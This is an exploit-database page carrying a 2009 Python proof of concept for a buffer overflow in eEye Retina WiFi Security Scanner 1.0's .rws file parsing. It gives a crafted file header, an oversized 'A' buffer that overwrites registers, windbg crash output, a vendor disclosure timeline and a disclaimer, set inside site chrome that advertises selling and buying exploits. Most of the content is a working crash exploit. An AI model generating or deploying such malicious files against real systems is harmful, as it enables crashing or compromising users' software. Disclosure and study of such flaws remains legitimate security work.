0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC
======================================================================== eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC ======================================================================== #!/usr/bin/python # # # * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability # # # * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices. # * Vendor: eEye Digital Security Inc. # * Product Web Page: http://www.eeye.com/ # * Current Version: 1.0.8.68 # * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package. # * Tested On Microsoft Windows XP Professional SP3 (English) # # * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic # * liquidworm gmail com # * http://www.zeroscience.org # * 16.05.2009 # # * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt # # # * --------------------------------windbg---------------------------------- * # # (1268.dd8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0 # eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** Defaulted to export symbols for [path]\WiFiCore.dll - # WiFiCore!LibWifi_ReportHTML+0x1b48e: # 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=?? # 0:000> g # (1268.dd8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150 # eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # *** Defaulted to export symbols for [path]\kernel32.dll - # kernel32!IsBadReadPtr+0x39: # 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=?? # # * -------------------------------/windbg---------------------------------- * # # # * Disclosure Timeline: # # * [16.05.2009] Vulnerability discovered. # * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof # of concept code. # * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply # from previous e-mail. # * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in # progress. # * [25.05.2009] Vendor contacted for information on patch development and its release process # because of our advisory disclosure policy. # * [29.05.2009] Vendor contacted again for information on patch development because of no reply # from previous e-mail. # * [29.05.2009] Vendor answered. Bug fixes scheduled within next week. # * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix # time line information. # * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed # the QA. The fix will be introduced in the next release of the product. Scheduled # date for the release of the update is not yet known...or...it's unknown :). # * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release # of the Retina package approximately on 29th of June. # * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release. # * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program # * fixes. Vendor will contact me after the tests, with the results from the same. # * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published # * on 10th of july because of internal company reasons. # * [09.07.2009] No reply from the vendor. # * [10.07.2009] Public advisory released. # # # # * Pozdrav Do: # # * sm, thricer, drowsy, Jayji, Leon Juranic, # * teppei, n3tpr0b3, DrunkY, apo, Aodrulez, # * kokanin, e.wiZz!, j0rgan, str0ke, Uploader, # * Jonathan Salwan, Sergio 'shadown' Alvarez, # * Malformation, dz0, d3, Greg Linares, lio, # * mio, drown, dni, Damjan, Maximiliano Soler, # * leetgeek, Preddy, Gliser, eSDee i t.d. :) # # # * Proof Of Concept: # #=========================================*snip*=========================================# header = ( "\x52\x57\x53" "\x30\x31\x30" "\x19\x52\x76" "\x00" ) buffer = "\x41" * 1574624 #[Bytes/chars] #1574622 No issues #1574623 BoF, Access violation when reading [random] #1574624 BoF, Access violation when reading [414141B1] #... payload = header + buffer file = "Abulia.rws" filetzio=open(file,'w') filetzio.write(payload) filetzio.close() print "\n[+] File " + file + " successfully landed.\n" #=========================================*snip*=========================================# ################################################################################# # # # * Disclaimer: # # # # * This document and all the information it contains are provided "as is", # # * for educational purposes only, without warranty of any kind, whether # # * express or implied. # # # # * The author reserves the right not to be responsible for the topicality, # # * correctness, completeness or quality of the information provided in # # * this document. Liability claims regarding damage caused by the use of # # * any information provided, including any kind of information which is # # * incomplete or incorrect, will therefore be rejected. # # # ################################################################################# # 0day.today [2024-12-25] #